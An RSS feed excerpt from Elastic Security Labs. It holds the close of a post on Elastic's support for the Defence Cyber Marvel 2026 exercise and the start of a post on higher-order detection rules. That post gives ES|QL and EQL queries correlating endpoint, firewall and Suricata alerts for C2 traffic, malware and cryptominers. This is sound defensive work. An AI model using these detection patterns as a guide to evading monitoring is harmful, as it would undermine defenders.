<p>All of this communication data represented a brilliant real-time window into range health, team sentiment, and the topics trending across the exercise. It felt too good to pass up, so we ingested the entire RocketChat conversation corpus into Elastic in real time and put it to work.</p>
<h3>Sentiment analysis and named entity recognition</h3>
<p>For named entity recognition, we deployed the <a href="https://huggingface.co/dslim/bert-base-NER">dslim/bert-base-NER</a> model from Hugging Face into a machine learning node on the NSOC deployment using the <a href="https://www.elastic.co/kr/guide/en/elasticsearch/client/eland/current/index.html">Elastic Eland client</a>. This was then wired into an Elasticsearch ingest pipeline that every RocketChat message passed through on ingestion. We took the extracted entities and surfaced the most common ones as dashboard themes, giving us a live view of the ebb and flow of conversation topics throughout the exercise.</p>
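<p>As a toy illustration of the theme-surfacing step, aggregating extracted entities into dashboard themes is essentially a frequency count. The tuple shape and entity labels below are illustrative, not the model's actual output format:</p>

```python
from collections import Counter

def top_themes(ner_results, k=3):
    """Aggregate per-message NER output into the most common themes.

    ner_results: one inner list of (entity_text, entity_type) tuples per
    RocketChat message (an assumed shape, for illustration only).
    """
    counts = Counter(
        text.lower()
        for message in ner_results
        for text, entity_type in message
        if entity_type in {"PER", "ORG", "LOC", "MISC"}
    )
    return [theme for theme, _ in counts.most_common(k)]

messages = [
    [("Elastic", "ORG"), ("Prevent mode", "MISC")],
    [("Elastic", "ORG"), ("Tuoni", "MISC")],
    [("Elastic", "ORG")],
]
print(top_themes(messages, k=1))  # ['elastic']
```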
<p>We also analysed group activity, user statistics, and general communication patterns to build a picture of life patterns for each team - most active participants, message volume over time, and sentiment trends pivoted by individual users. All told, it gave us some genuinely interesting insight into what was happening on the range in near real time. When we switched Elastic Agent into Prevent mode, for instance, a word cloud on our dashboard immediately lit up with &quot;Elastic&quot; as the most discussed theme across all channels - Blue Teams discussing its effectiveness, Red Teams lamenting their lost beacons. Rather satisfying, that.</p>
<h3>Meme analysis (yes, really)</h3>
<p>Finally - and this one raised a few eyebrows - we pulled every meme submitted to the channels, vectorised the images, and ran nearest-neighbour evaluations to cluster similar memes and topics together. We also passed them through the zero-shot NER inference model to generate thematic descriptions of each meme's content. The logic was that these outputs might prove useful later for filtering, moderation, or other in-game interactions. Whether the meme analysis yielded operationally critical intelligence is debatable. Whether it was good fun is not.</p>
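<p>A minimal sketch of the nearest-neighbour step, using toy three-dimensional vectors in place of real image embeddings (which would come from a vision model):</p>

```python
import math

def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb)

def nearest(query, vectors):
    """Index of the stored meme vector most similar to the query."""
    return max(range(len(vectors)), key=lambda i: cosine(query, vectors[i]))

# toy "image embeddings" - real ones would have hundreds of dimensions
memes = [[0.9, 0.1, 0.0], [0.0, 0.8, 0.2], [0.85, 0.15, 0.05]]
print(nearest([1.0, 0.0, 0.0], memes))  # 0 (closest to the first vector)
```

In production the same lookup would be a kNN search against a dense-vector field in Elasticsearch rather than a linear scan.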
<h2>Nipping problems in the bud</h2>
<p>As much as we hoped everything would run smoothly during exercise week, things inevitably break, aren't fully understood, or need further customisation to suit how a particular team wants to use them. For this, we had our own subsection of the in-range helpdesk where Elastic and GenAI-specific requests could be raised by any team.</p>
<p>We manned this helpdesk for the entire duration of the exercise, providing guidance, documentation, issue debugging, and range-specific recommendations. That last point is worth expanding on. Sometimes, what a Blue Team was seeing in Elastic wasn't actually an Elastic problem at all, but rather Elastic faithfully surfacing something on the range that warranted further investigation (Red Teams can cause absolute mayhem, and the telemetry doesn't lie). Over the course of the exercise, we covered 125 individual support requests from teams specifically asking for help from us at Elastic.</p>
<h3>Pre-emptive debugging with Tines</h3>
<p>Beyond visiting teams via VTC or in person at EXCON, we also worked with <a href="https://www.tines.com/partners/elastic-security/">Tines</a> to try something a bit more proactive. We pulled the ticket body from incoming requests, attempted to categorise the problem, ran the categorisation against our corpus of previously resolved tickets, and had GenAI produce a summarised first-pass response aimed at solving the user's issue before triage brought it to our queue.</p>
<p>This is actually a pattern we borrowed from our own <a href="https://www.elastic.co/kr/blog/elastic-wins-2025-best-use-of-ai-for-assisted-support">support organisation at Elastic</a>, where we provide a similar capability using our extensive knowledge base of previously solved issues as a repository for supporting AI Agent context. The idea is straightforward: use past solutions to give a machine-generated, informed first stab at resolving a problem, and short-circuit the need for a support engineer to pick up every ticket manually. It didn't solve everything; some issues genuinely needed a human with range context, but it meaningfully reduced the queue pressure and got faster answers to the teams who needed them. This was such a success with our own specific tickets and queue that we actually extended the remit to the entire helpdesk in the latter part of the exercise, helping to reduce the load on the other groups in the Green team supporting the exercise.</p>
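<p>A minimal sketch of the retrieval idea - matching a new ticket against previously resolved ones - using simple token overlap in place of the GenAI pipeline. The ticket bodies and the <code>best_match</code> helper are made up for illustration:</p>

```python
def tokens(text):
    return set(text.lower().split())

def best_match(new_ticket, resolved):
    """Pick the resolved ticket whose body best overlaps the new one (Jaccard)."""
    def jaccard(a, b):
        return len(a & b) / len(a | b) if a | b else 0.0
    query = tokens(new_ticket)
    return max(resolved, key=lambda t: jaccard(query, tokens(t["body"])))

resolved = [
    {"body": "agent enrollment token expired fleet", "fix": "Re-issue the enrollment token."},
    {"body": "kibana dashboard slow shard count", "fix": "Reduce shard count per index."},
]
match = best_match("fleet agent enrollment failing", resolved)
print(match["fix"])  # Re-issue the enrollment token.
```

The real workflow swapped the Jaccard score for semantic retrieval and fed the matched resolution into an LLM to draft the first-pass response.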
<h2>Industry partnerships: Better together</h2>
<p>One of the things we're most proud of is how our partnership ecosystem has grown year on year. DCM is not just an Elastic show; it's a genuine coalition of industry partners, each bringing something unique to the security platform.</p>
<p><strong>Year 1 (DCM2)</strong> - Elastic joined as an industry partner, providing the security monitoring and endpoint detection platform.</p>
<p><strong>Year 2 (DCM3)</strong> - We brought in Endace, providing 1:1 packet capture capability. Full packet capture alongside Elastic's network visibility gave teams the ability to conduct deep-dive forensics that log-based analysis alone can't provide.</p>
<p><strong>Year 3 (DCM4)</strong> - Tines joined the family, bringing workflow automation to the table. Blue Teams could now build automated response playbooks, triage workflows, and notification chains, all integrated directly into their Elastic environment via the native Tines connector.</p>
<p><strong>Year 4 (DCM26, formerly DCM5)</strong> - AWS came on board, providing Bedrock access for our AI agents and contributing funding towards the Elastic deployments. This was a significant milestone; having a hyperscaler directly invested in the exercise's success unlocked capabilities (such as compliant, UK-tenanted AI inference with full guardrails and audit logging) that simply wouldn't have been possible otherwise. Tines' integration this year was also enhanced by the addition of on-range access to LLMs. The DCM series also reached a milestone this year, transitioning from its origins as an Army Cyber Association initiative to an officially funded programme under Cyber and Specialist Operations Command.</p>
<p><strong>To the teams at Endace, Tines, and AWS - sincere thanks. This exercise is better because of your contributions, and all Teams are better equipped because of the platform we've built together. We're already planning for DCM27. Cheers to the lot of you.</strong></p>
<h2>Culture, highlights, and the bits that make it worthwhile</h2>
<h3>The Challenge Coins</h3>
<p>We had custom challenge coins minted for DCM26. If you know, you know: challenge coins are a long-standing military tradition, and having one made for the exercise felt like the right way to mark our fourth year of involvement.</p>
<h3>The cocktail party</h3>
<p>We were also grateful to be invited to the High Commission cocktail party hosted by the British High Commissioner to Singapore. There's something quite surreal about discussing Elasticsearch shard counts and Terraform state management whilst holding a gin and tonic at the ambassador's invitation. It was a brilliant evening, a genuine reminder that these exercises exist at the intersection of technology and diplomacy, and that the relationships built here extend well beyond the technical.</p>
<h2>Wrapping up</h2>
<p>The multi-tenanted architecture proved itself under sustained load; the native Elastic AI features (<a href="https://www.elastic.co/kr/elasticsearch/ai-assistant">AI Assistant</a> and <a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a>) gave teams capabilities that would have been science fiction a few years ago; and the custom AI agents exceeded our expectations for adoption. The partnership model continues to demonstrate that industry involvement in defence exercises creates outcomes that no single organisation could achieve alone.</p>
<p>Defence Cyber Marvel 2026 was a landmark iteration of an exercise that continues to grow in ambition, complexity, and impact. For Elastic, being trusted to provide the core defensive security platform for 40 Blue Teams from 29 nations, and this year, the AI capability as well, is something we don't take lightly. The exercise develops real skills for real people who will go on to defend real networks, and being a part of that mission is genuinely meaningful.</p>
<p>As the <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government's press release</a> put it, DCM demonstrates the practical value of real-life scenarios that reinforce international partnerships. We couldn't agree more.</p>
<p>We'll be back next year, and I suspect we'll have even more to talk about. In the meantime, we'll continue to improve the product so that support for environments such as Defence Cyber Marvel excels year over year.</p>
<p>See you on the range.</p>
<p>Follow the DCM26 story on social media:</p>
<p><a href="https://www.facebook.com/RSIGNALS/posts/last-week-defence-cyber-marvel-2026-based-in-singapore-brought-together-2500-par/1338105391677347/">Facebook</a> | <a href="https://www.linkedin.com/posts/uk-in-singapore_defence-cyber-marvel-2026pdf-activity-7426505462310752258-1aHq?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABiQ31MBIbDwn5LYMrolM4rznGQcLabrY9A">LinkedIn</a> | <a href="https://www.instagram.com/p/DU00Y1jCKbr/">Instagram</a></p>
<h2>Further reading</h2>
<p><em>Elastic Security &amp; AI</em></p>
<ul>
<li><a href="https://www.elastic.co/kr/security-labs">Elastic Security</a> - The platform powering the Blue Team deployments</li>
<li><a href="https://www.elastic.co/kr/elasticsearch/ai-assistant">AI Assistant for Security</a> - Context-aware AI chat within Elastic Security</li>
<li><a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> - LLM-powered alert correlation and threat narrative generation</li>
<li><a href="https://www.elastic.co/kr/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder</a> - Framework for building custom AI agents with Elasticsearch</li>
</ul>
<p><em>Infrastructure &amp; Tooling</em></p>
<ul>
<li><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a> - Infrastructure as Code for the Elastic Stack</li>
<li><a href="https://www.elastic.co/kr/docs/reference/fleet">Elastic Fleet Guide</a> - Centrally managing Elastic Agents at scale</li>
<li><a href="https://github.com/ClarifiedSecurity/catapult">Catapult by Clarified Security</a> - Ansible-based cyber range provisioning</li>
</ul>
<p><em>Exercise Context</em></p>
<ul>
<li><a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government DCM26 Press Release</a> - Official overview of the exercise</li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/elastic-defence-cyber-marvel.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Prioritizing Alerts Triage with Higher-Order Detection Rules]]></title>
            <link>https://www.elastic.co/kr/security-labs/higher-order-detection-rules</link>
            <guid>higher-order-detection-rules</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Scaling SOC efficiency through multi-signal correlation and higher-order detection patterns.]]></description>
            <content:encoded><![CDATA[<p>At Elastic, we operate a large and diverse set of behavior detection rules across multiple datasets, environments, and severity levels. Most of these rules are atomic, each designed to detect a specific behavior, signal, or attack pattern. In addition, we ingest and promote <a href="https://github.com/elastic/detection-rules/tree/main/rules/promotions">external alerts</a> from security integrations such as firewalls, EDR, WAF, and other security controls.</p>
<p>The result is powerful visibility but also significant alert volume. From our telemetry, even when considering only non-<a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>, <strong>65</strong> unique detection rules generate nearly <strong>8,000 alerts per day per production cluster</strong>. Analyzing each alert in isolation is neither scalable nor cost-effective.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image6.png" alt="" /></p>
<p>This is where <strong>Higher-Order Rules</strong> come into play.</p>
<p><a href="https://github.com/search?q=repo%3Aelastic%2Fdetection-rules++%22Rule+Type%3A+Higher-Order+Rule%22+path%3A%2F%5Erules%5C%2F%2F&amp;type=code">Higher-order</a> rules do not detect a single behavior. Instead, they correlate related alerts over time, across data sources, or within a shared context (such as host, user, IP, or process). By grouping signals into meaningful patterns, we can prioritize what truly matters and reduce the need for deep, expensive analysis on every individual alert whether performed manually, automated, or augmented by AI.</p>
<p>In this blog, we’ll walk through our approach to building Higher-Order Rules in Elastic, share practical examples, and highlight key lessons learned along the way.</p>
<h2>What Are Higher-Order Rules?</h2>
<p>Higher-Order Rules (HOR) are detections that use <strong>alerts as input</strong>, either correlating alerts with other alerts (alert-on-alert) or combining alerts with additional data such as raw events, metrics, or contextual telemetry.</p>
<p>Unlike atomic rules that detect a single behavior, Higher-Order Rules identify patterns across signals. Their purpose is not to replace base detections, but to elevate combinations of findings that are more likely to represent real attack activity. In practice, they surface higher-confidence findings and improve triage prioritization. Higher-Order rules are designed to work alongside <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>. Building block rules generate alerts that do not appear in the default alerts view, reducing noise while still feeding correlated detections. Many of the base rules referenced in this article can also be configured as building block rules, so that only Higher-Order correlations surface for analyst review.</p>
<p>The core insight is that independent detections converging on the same entity compound confidence: each additional signal multiplies the likelihood that the activity is real rather than benign. Three design principles operationalize that insight:</p>
<h3>1. Entity-Based Correlation</h3>
<p>Rules correlate activity by shared entities such as host, user, source IP, destination IP, or process - allowing analysts to quickly see when multiple findings converge on the same asset or identity.</p>
<h3>2. Cross–Data Source Visibility</h3>
<p>Some rules operate within a single integration (for example, endpoint-only detections from Elastic Defend or third-party EDR). Others intentionally combine signals across domains - endpoint with network (PANW, FortiGate, Suricata), endpoint with email, or endpoint with system metrics - to capture multi-stage or cross-surface activity.</p>
<h3>3. Time and Prevalence Awareness</h3>
<p>Temporal logic plays a key role.</p>
<p>Newly observed rules highlight the first occurrence of a given alert within a defined lookback window (for example, five days), ensuring that even a single rare alert is surfaced for review.</p>
<p>Prevalence-based logic (such as using <code>INLINESTATS</code>) filters for alerts that occur on only a small number of hosts globally, helping reduce noise and emphasize anomalous behavior.</p>
<p>The full set of Higher-Order Rules spans endpoint-only correlations, cross-domain detections (endpoint + network, endpoint + email), lateral movement patterns (for example, <code>alert_1 host.ip = alert_2 source.ip</code>), ATT&amp;CK-aligned groupings (single or multi-tactic activity), newly observed alerts, and alert-to-event correlation (such as alerts combined with abnormal CPU metrics). The following sections walk through representative examples from these categories.</p>
<h2>Correlation and Newly Observed Higher-Order Rules</h2>
<p>In practice, high-risk activity does not always look the same.</p>
<p>Sometimes compromise reveals itself through <strong>multiple converging signals</strong>. Other times, it appears as a <strong>single alert that has never been seen before</strong>.</p>
<p>To handle both realities, we organize our Higher-Order Rules into three complementary patterns:</p>
<ul>
<li><strong>Correlation rules</strong> - multiple alerts or events linked to a shared entity (host, user, IP, or process).</li>
<li><strong>Newly observed rules</strong> - a single alert that is rare or first-seen within a defined time window.</li>
<li><strong>Hybrid patterns</strong> - combining correlation with first-seen logic, which can further elevate suspicion and surface particularly interesting activity.</li>
</ul>
<p>Correlation rules raise confidence through signal density and diversity: when several independent detections point to the same entity, the likelihood of real malicious activity increases.</p>
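<p>In likelihood-ratio terms, the compounding effect looks like this. The prior and per-signal ratios below are assumptions for illustration, not measured values from our telemetry:</p>

```python
def posterior_odds(prior_odds, likelihood_ratios):
    """Compound independent signals: posterior odds = prior odds x product of LRs."""
    odds = prior_odds
    for lr in likelihood_ratios:
        odds *= lr
    return odds

prior = 1 / 999  # assume ~0.1% of hosts are compromised at any moment
one_alert = posterior_odds(prior, [5.0])          # a single medium-fidelity alert
three_alerts = posterior_odds(prior, [5.0] * 3)   # three independent detections
print(round(three_alerts / one_alert))  # 25: two extra signals multiply the odds by 5 x 5
```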
<p>Newly observed rules address the opposite case, low volume but high novelty. They prioritize alerts based on rarity over time, ensuring that first-time or highly unusual detections are not overlooked simply because they occur once.</p>
<p>Together, these approaches form the foundation of an efficient and scalable triage strategy.</p>
<p>Let’s dive into examples and explore the differences, strengths, and trade-offs of each pattern.</p>
<h3>Endpoint Alerts Correlation</h3>
<p>A significant portion of real-world attack discovery comes from endpoint telemetry. It provides rich context - process activity, command lines, file behavior, and user actions - making it one of the most powerful detection sources.</p>
<p>At the same time, endpoint environments are dynamic. Legitimate software, admin tools, and third-party applications (and recently GenAI endpoint utilities 🥲) can generate high alert volume and false positives, requiring continuous tuning.</p>
<p>Higher-Order correlation helps address this by shifting the focus from individual alerts to <strong>multiple distinct signals on the same host or process</strong> - increasing confidence while reducing unnecessary investigation effort.</p>
<p>The following ES|QL query triggers when, within a 24-hour window on the same host, there are 3 unique Elastic Defend behavior rules, OR alerts from different features (e.g. one shellcode_thread alert alongside a behavior alert, or malicious_file with behavior), OR 2 or more distinct malware file hashes:</p>
<pre><code>from logs-endpoint.alerts-* metadata _id
| eval day = DATE_TRUNC(24 hours, @timestamp)
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;,  &quot;shellcode_thread&quot;, &quot;behavior&quot;) and 
 agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;)
| stats Esql.alerts_count = COUNT(*),
        Esql.event_code_distinct_count = count_distinct(event.code),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.file_hash_distinct_count = COUNT_DISTINCT(file.hash.sha256),
        Esql.process_entity_id_distinct_count = COUNT_DISTINCT(process.entity_id) by host.id, day
| where (Esql.event_code_distinct_count &gt;= 2 or Esql.rule_name_distinct_count &gt;= 3 or Esql.file_hash_distinct_count &gt;= 2)
</code></pre>
<p>To further raise suspicion, we can also correlate Elastic Defend alerts that belong to the same process tree:</p>
<pre><code>from logs-endpoint.alerts-*
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;, &quot;shellcode_thread&quot;, &quot;behavior&quot;) and
        agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;) and process.Ext.ancestry is not null

// aggregate alerts by process.Ext.ancestry and agent.id
| stats Esql.alerts_count = COUNT(*),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.event_code_distinct_count = COUNT_DISTINCT(event.code),
        Esql.process_id_distinct_count = COUNT_DISTINCT(process.entity_id),
        Esql.message_values = VALUES(message),
   ... by process.Ext.ancestry, agent.id

// filter for at least 3 unique process IDs and 2 or more alert types or rule names.
| where Esql.process_id_distinct_count &gt;= 3 and (Esql.rule_name_distinct_count &gt;= 2 or Esql.event_code_distinct_count &gt;= 2)

// keep unique values
| stats Esql.alert_names = values(Esql.message_values),
        Esql.alerts_process_cmdline_values = VALUES(Esql.process_command_line_values),
... by agent.id
| keep Esql.*, agent.id
</code></pre>
<p>Example of matches:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image9.png" alt="" /></p>
<p>To complement our coverage, we also need to look for rare atomic alerts. The following ES|QL is designed to run on a 10-minute schedule with a 5- or 7-day lookback window. The lookback aggregates all alerts by rule name over the full window to compute the first-seen time. The final filter (<code>Esql.recent &lt;= 10</code>) ensures only rules whose first-seen time falls within the current 10-minute execution window are surfaced, effectively detecting the moment a rule fires for the first time in the lookback period. This surfaces both rare false positives and stealthy behaviors that might otherwise be lost in volume:</p>
<pre><code>from logs-endpoint.alerts-*
| WHERE event.code == &quot;behavior&quot; and rule.name is not null
| STATS Esql.alerts_count = count(*),
        Esql.first_time_seen = MIN(@timestamp),
        Esql.last_time_seen = MAX(@timestamp),
        Esql.agents_distinct_count = COUNT_DISTINCT(agent.id),
        Esql.process_executable = VALUES(process.executable),
        Esql.process_parent_executable = VALUES(process.parent.executable),
        Esql.process_command_line = VALUES(process.command_line),
        Esql.process_hash_sha256 = VALUES(process.hash.sha256),
        Esql.host_id_values = VALUES(host.id),
        Esql.user_name = VALUES(user.name) by rule.name
// first time seen in the last 5 days - defined in the rule schedule Additional look-back time
| eval Esql.recent = DATE_DIFF(&quot;minute&quot;, Esql.first_time_seen, now())
// first time seen is within 10m of the rule execution time
| where Esql.recent &lt;= 10 and Esql.agents_distinct_count == 1 and Esql.alerts_count &lt;= 10 and (Esql.last_time_seen == Esql.first_time_seen)
// Move single values to their corresponding ECS fields for alerts exclusion
| eval host.id = mv_min(Esql.host_id_values)
| keep host.id, rule.name, Esql.*
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image7.png" alt="" /></p>
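<p>The first-seen gating in the query above can be sketched outside ES|QL. This minimal Python equivalent uses hypothetical minute offsets in place of real <code>@timestamp</code> values:</p>

```python
def newly_observed(alerts, now, window_minutes=10):
    """Surface rule names whose earliest alert falls within the current window.

    alerts: list of (rule_name, timestamp_minutes) pairs - made-up minute
    offsets standing in for real alert timestamps.
    """
    first_seen = {}
    for rule, ts in alerts:
        first_seen[rule] = min(ts, first_seen.get(rule, ts))
    return sorted(
        rule for rule, ts in first_seen.items()
        if now - ts <= window_minutes
    )

alerts = [
    ("Old Rule", 10), ("Old Rule", 995),  # first seen long ago: ignored
    ("New Rule", 997),                    # first fired 3 minutes ago: surfaced
]
print(newly_observed(alerts, now=1000))  # ['New Rule']
```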
<p>The same <a href="https://github.com/elastic/detection-rules/blob/d358641c452dc0af5ab85d02f6f8948ec57c7ab9/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">logic</a> can be applied to an <a href="https://github.com/elastic/detection-rules/blob/main/rules/promotions/external_alerts.toml#L27">External Alert</a> from other third party EDRs:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image2.png" alt="" /></p>
<h3>Endpoint with Network Alerts Correlation</h3>
<p>A powerful detection approach is correlating endpoint alerts with network alerts. This helps answer the key question:</p>
<p><strong>Which process triggered this network alert?</strong></p>
<p>Network alerts alone often lack process context, such as which user or executable initiated the activity. By combining network alerts with endpoint telemetry (EDR data), you can enrich alerts with:</p>
<ul>
<li>Process name and hash</li>
<li>Command line and parent process</li>
<li>User and device information</li>
</ul>
<p>The following query correlates any Elastic Defend alert with suspicious events from network security devices such as Palo Alto Networks (PANW) and Fortinet FortiGate. The join key is the IP address: for network alerts this is <code>source.ip</code>; for endpoint alerts it is <code>host.ip</code>. The query normalizes these into a single field using <code>COALESCE</code>, enabling correlation across data sources that use different field names for the same entity. A match may indicate that the host is compromised and triggering multi-datasource alerts.</p>
<pre><code>FROM logs-* metadata _id
| WHERE 
 (event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;) or
 (event.dataset == &quot;panw.panos&quot; and event.action in (&quot;virus_detected&quot;, &quot;wildfire_virus_detected&quot;, &quot;c2_communication&quot;, ...)) or
 (event.dataset == &quot;fortinet_fortigate.log&quot; and (...)) or
 (event.dataset == &quot;suricata.eve&quot; and message in (&quot;Command and Control Traffic&quot;, &quot;Potentially Bad Traffic&quot;, ...))
| eval 
      fw_alert_source_ip = CASE(event.dataset in (&quot;panw.panos&quot;, &quot;fortinet_fortigate.log&quot;), source.ip, null),
      elastic_defend_alert_host_ip = CASE(event.module == &quot;endpoint&quot; and event.dataset == &quot;endpoint.alerts&quot;, host.ip, null)
| eval Esql.source_ip = COALESCE(fw_alert_source_ip, elastic_defend_alert_host_ip)
| where Esql.source_ip is not null
| stats Esql.alerts_count = COUNT(*),
        Esql.event_module_distinct_count = COUNT_DISTINCT(event.module),
        Esql.message_values_distinct_count = COUNT_DISTINCT(message),
        ... by Esql.source_ip
| where Esql.event_module_distinct_count &gt;= 2 AND Esql.message_values_distinct_count &gt;= 2
| eval concat_module_values = MV_CONCAT(Esql.event_module_values, &quot;,&quot;)
| where concat_module_values like &quot;*endpoint*&quot;
</code></pre>
<p>Example of matches correlating Elastic Defend and FortiGate alerts, where the <code>source.ip</code> of the FortiGate alert equals the <code>host.ip</code> of the Elastic Defend endpoint alert:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image3.png" alt="" /></p>
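<p>The <code>COALESCE</code> normalization is the crux of the cross-source join. A minimal Python sketch of the same idea, with made-up alert records:</p>

```python
def join_key(alert):
    """Normalize the per-source IP field into one correlation key,
    mirroring the COALESCE step in the ES|QL above."""
    if alert["dataset"] in ("panw.panos", "fortinet_fortigate.log"):
        return alert.get("source.ip")
    if alert["dataset"] == "endpoint.alerts":
        return alert.get("host.ip")
    return None

alerts = [
    {"dataset": "endpoint.alerts", "host.ip": "10.0.0.5"},
    {"dataset": "panw.panos", "source.ip": "10.0.0.5"},
]
by_ip = {}
for alert in alerts:
    key = join_key(alert)
    if key:
        by_ip.setdefault(key, []).append(alert["dataset"])

# keep only hosts with alerts from two or more distinct data sources
print({ip: ds for ip, ds in by_ip.items() if len(set(ds)) >= 2})
```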
<p>The following EQL query correlates Suricata alerts with Elastic Defend network events to provide context about the source process and host:</p>
<pre><code>sequence by source.port, source.ip, destination.ip with maxspan=5s
// Suricata severity 3 corresponds to informational alerts, which are excluded to reduce noise
[network where event.dataset == &quot;suricata.eve&quot; and event.kind == &quot;alert&quot; and event.severity != 3 and source.ip != null and destination.ip != null]
[network where event.module == &quot;endpoint&quot; and event.action in (&quot;disconnect_received&quot;, &quot;connection_attempted&quot;)]
</code></pre>
<p>Example of matches confirming the Suricata alert and linking it, via Elastic Defend events, to the target web server process (nginx) behind the web-exploitation attempt:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image8.png" alt="" /></p>
<h3>Endpoint Security with Observability</h3>
<p>Correlating observability telemetry with security alerts is a powerful detection strategy.</p>
<p>The <a href="https://en.wikipedia.org/wiki/XZ_Utils_backdoor">XZ</a> Utils backdoor incident demonstrated that security-relevant anomalies may first surface as performance regressions rather than traditional security alerts. In that case, unusual behavior in the SSH daemon led to deeper investigation and eventual discovery of malicious code.</p>
<p>This highlights an important principle: <strong>operational anomalies can be early indicators of compromise.</strong></p>
<p>With the <a href="https://www.elastic.co/kr/docs/reference/integrations/system#metrics-reference">Elastic Agent</a>, system metrics such as CPU and memory utilization can be collected alongside security telemetry. By correlating abnormal resource spikes with SIEM alerts - either by process or by host - we can increase detection confidence and surface high-risk activity earlier.</p>
<p>For example, an ES|QL correlation rule can identify a process exhibiting sustained 70% CPU utilization that is also the source of a memory signature alert for a cryptominer from Elastic Defend. Individually, each signal may be low or medium severity. Correlated together, they represent high-confidence malicious activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/higher-order-detection-rules/image1.png" alt="" /></p>
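<p>A minimal sketch of what such a correlation can look like in ES|QL is shown below. The index patterns, field names, and thresholds here are illustrative placeholders, not the shipped rule:</p>
<pre><code>FROM metrics-system.process-*, .alerts-security.alerts-default
| WHERE (event.dataset == "system.process" AND system.process.cpu.total.pct &gt; 0.7)
    OR (event.kind == "signal" AND kibana.alert.rule.name LIKE "*Cryptominer*")
| STATS cpu_samples = COUNT(*) WHERE event.dataset == "system.process",
        miner_alerts = COUNT(*) WHERE event.kind == "signal"
    BY host.name, process.name
| WHERE cpu_samples &gt;= 5 AND miner_alerts &gt; 0
</code></pre>
<p>Filtered aggregations (<code>COUNT(*) WHERE …</code>) let a single query count both the metric spikes and the endpoint alerts per process, so only entities exhibiting both signals survive the final filter.</p>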
<p>We developed <strong>over 30 Higher-Order detections</strong> covering various types of relationships. While we can’t cover all of them here, the links below provide <strong>enough context to adapt these rules to your environment</strong>:</p>
<p>Endpoint Alerts:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_defend_by_host.toml#L16">Multiple Elastic Defend Alerts by Agent</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_edr_elastic_same_process_tree.toml#L16">Multiple Elastic Defend Alerts from a Single Process Tree</a><br />
<a href="https://github.com/elastic/detection-rules/blob/6a7c1e96749fd5c2fc8801da747f4e29d18150a1/rules/cross-platform/multiple_elastic_defend_behavior_rules_same_host_prevalence.toml#L19">Multiple Rare Elastic Defend Behavior Rules by Host</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_elastic_defend_alert.toml#L17">Newly Observed Elastic Defend Behavior Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_external_edr_alerts_by_host.toml#L16">Multiple External EDR Alerts by Host</a></p>
<p>Endpoint and Network:<br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_panos_alert.toml#L17">Newly Observed Palo Alto Network Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/newly_observed_suricata_alert.toml#L17">Newly Observed High Severity Suricata Alert</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_socks_fortigate_endpoint.toml#L19">FortiGate SOCKS Traffic from an Unusual Process</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml#L17">PANW and Elastic Defend - Command and Control Correlation</a><br />
<a href="https://github.com/elastic/detection-rules/blob/ae88c095e95d78aae3766875de2ce8d6d34c40c4/rules/cross-platform/multiple_alerts_elastic_defend_netsecurity_by_host.toml#L18">Elastic Defend and Network Security Alerts Correlation</a><br />
